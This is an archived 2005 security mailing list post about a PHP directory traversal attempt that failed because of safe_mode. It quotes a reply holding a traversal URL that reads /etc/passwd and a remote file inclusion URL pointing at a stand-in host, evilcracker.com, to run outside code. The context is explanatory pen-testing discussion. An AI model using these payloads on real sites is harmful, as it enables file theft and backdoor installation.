WebApp Sec mailing list archives
Re: PHP Directory Transversal
From: "Andres Molinetti" <andymolinetti () hotmail com>
Date: Mon, 14 Mar 2005 17:02:38 +0000
It seems that the problem was that it had "safe_mode" on.... Thank you all for the replies! Cheers, Andy
From: John GALLET <john.gallet () wanadoo fr> To: Andres Molinetti <andymolinetti () hotmail com> CC: pen-test () securityfocus com, <webappsec () securityfocus com> Subject: Re: PHP Directory Transversal Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET) Hi there, > Therefore, I tried doing a > www.example.com/static.php?page=../../../../../../etc/passwd > but I get an error saying that file doesn't exist. > I user the same source code in my server, and I could retrieve the > file...what can be happening? I don't think it is under a chroot jail... What you can or can not read depends on the configuration of php (include_path vs safe mode for example). Have a look at : http://fr3.php.net/features.safe-mode Now the real risk is not so much reading some source code as executing some other people's code. www.example.com/static.php?page=http://evilcracker.com/evil_code.txt has good chances of also getting executed, which opens the path to install any backdoor, download perl scripts/trojans, etc... HTH JG
_________________________________________________________________Un amor, una aventura, compañía para un viaje. Regístrate gratis en MSN Amor & Amistad. http://match.msn.es/match/mt.cfm?pg=channel&tcid=162349
Current thread:
- PHP Directory Transversal Andres Molinetti (Mar 13)
- Re: PHP Directory Transversal Felikz (Mar 13)
- Re: PHP Directory Transversal Andres Molinetti (Mar 13)
- RE: PHP Directory Transversal Mehmet Buyukozer (Mar 13)
- Re: PHP Directory Transversal Andres Molinetti (Mar 13)
- Re: PHP Directory Transversal Richard Moore (Mar 13)
- Re: PHP Directory Transversal Sarath Kummamuru (Mar 13)
- RE: PHP Directory Transversal Ravish (Mar 13)
- Re: PHP Directory Transversal David M. Zendzian (Mar 13)
- Re: PHP Directory Transversal John GALLET (Mar 18)
- Re: PHP Directory Transversal Andres Molinetti (Mar 18)
- Re: PHP Directory Transversal Alex 'CAVE' Cernat (Mar 20)
- Re: PHP Directory Transversal Andres Molinetti (Mar 18)
- Re: PHP Directory Transversal Felikz (Mar 13)